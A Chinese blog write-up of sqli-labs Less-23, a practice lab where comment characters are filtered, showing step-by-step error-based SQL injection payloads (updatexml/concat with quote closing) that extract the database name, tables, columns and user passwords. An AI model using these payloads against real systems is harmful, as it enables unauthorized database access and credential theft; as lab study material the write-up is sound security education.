sqli-labs关卡23(基于get提交的过滤注释符的报错注入)

无名小卒且不会安全的zzyyhh2024-01-16 17:11

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾前几关知识点

前几关是基于http头部注入,由于开发人员为了方便记录用户cookie、xff、user-agent、referer等头部信息与数据库交互,但是没有严格过滤这些参数,导致攻击者可以拼接任意sql语句到数据库中实现非法数据库查询。这一关是开始有过滤敏感字符了。

二、靶场第二十三关通关思路

  • 1、判断注入点
  • 2、爆数据库名
  • 3、爆数据库表
  • 4、爆数据库列
  • 5、爆数据库关键信息

1、判断注入点

这一关又回到了前10关的get提交的注入了,老规矩输入万能语句 and 1=1 和and 1=2 发现页面均正常,说明不是数字型。直接提交一个单引号发现报错了(如图所示),报错信息为

Warning: mysql_fetch_array() expects parameter 1 to be resource,

boolean given in C:\tools\phpstudy_pro\WWW\sqli-labs\Less-23\index.php

on line 38 You have an error in your SQL syntax; check the manual that

corresponds to your MySQL server version for the right syntax to use

near ''1'' LIMIT 0,1' at line 1


我们进一步猜想看看是不是单引号,我们构造payload

sql 复制代码 
1' and 1=1--+
sql 复制代码 
1' and 1=2--+

发现居然都是报错,按道理应该是1=1是正常的,1=2才是页面异常,难道是我们的思路错了吗?我们仔细观察,他页面异常还是单引号闭合的问题,还是因为多了一个单引号导致sql查询语句错误。所以这里应该是注释符的问题,他没有把后面多的单引号过滤掉。本来应该是id=1' and 1=1--+'的。所以考虑是注释符被过滤了,看源码发现注释符确实被过滤了,被替换为空了(如图所示)


所以我们不能用注释符构造payload了,注释符的作用其实就是为了闭合多余的一个单引号,让我们payload顺利拼接到数据库查询。既然用不了那我们自己闭合。

payload为

sql 复制代码 
1' and '1'='1

payload这样就能成功解决多一个单引号的问题了,带入数据库的语句这样就不会报错id='1' and '1'='1'(如图所示)

2、爆数据库名

这里由于不知道显位order by闭合payload,不知道显位是多少个,这里我就用报错注入了。这里后面加or '1'='1是为了闭合多余的单引号。

payload为

sql 复制代码 
1' and updatexml(1,concat(0x3a,(select database()),0x3a),1) or '1'='1

3、爆数据库表

payload为

sql 复制代码 
1' or updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1) or '1'='1

4、爆数据库列

payload为

sql 复制代码 
1' or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1) or '1'='1
sql 复制代码 
1' or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1) or '1'='1

5、爆数据库关键信息

payload为

sql 复制代码 
1' or updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1) or '1'='1
sql 复制代码 
1' or updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1) or '1'='1

总结

这一关是一个get提交的单引号闭合的注入,与之前不同的是这一关注释符被过滤为空了,我们得自己构造闭合。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

相关推荐
weixin_472339462 小时前
网络安全之XSS漏洞:原理、危害与防御实践
安全·web安全·xss
He.ZaoCha4 小时前
函数-1-字符串函数
数据库·sql·mysql
Code季风7 小时前
SQL关键字快速入门:HAVING 分组后的条件过滤
数据库·sql·mysql
Par@ish9 小时前
【网络安全】恶意 Python 包“psslib”仿冒 passlib,可导致 Windows 系统关闭
windows·python·web安全
星辰离彬20 小时前
Java 与 MySQL 性能优化:Java应用中MySQL慢SQL诊断与优化实战
java·后端·sql·mysql·性能优化
zhuiQiuMX1 天前
脉脉maimai面试死亡日记
数据仓库·sql·面试
花木偶1 天前
【郑大二年级信安小学期】Day6:CTF密码学&杂项&工具包
安全·web安全·密码学
GEEK零零七1 天前
Leetcode 1070. 产品销售分析 III
sql·算法·leetcode
御控工业物联网1 天前
御控网关如何实现MQTT、MODBUS、OPCUA、SQL、HTTP之间协议转换
数据库·sql·http
黑客老李1 天前
EDUSRC:智慧校园通用漏洞挖掘(涉校园解决方案商)
服务器·前端·网络·安全·web安全
热门推荐
01集群聊天服务器---MySQL数据库的建立02Java学习第十五部分——MyBatis03Coze扣子平台完整体验和实践(附国内和国际版对比)04基于odoo17的设计模式详解---单例模式05使用Ruby接入实时行情API教程06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07《深入设计模式》模式结构汇总08基于odoo17的设计模式详解---装饰模式09DeepSeek各版本说明与优缺点分析10Java类变量(静态变量)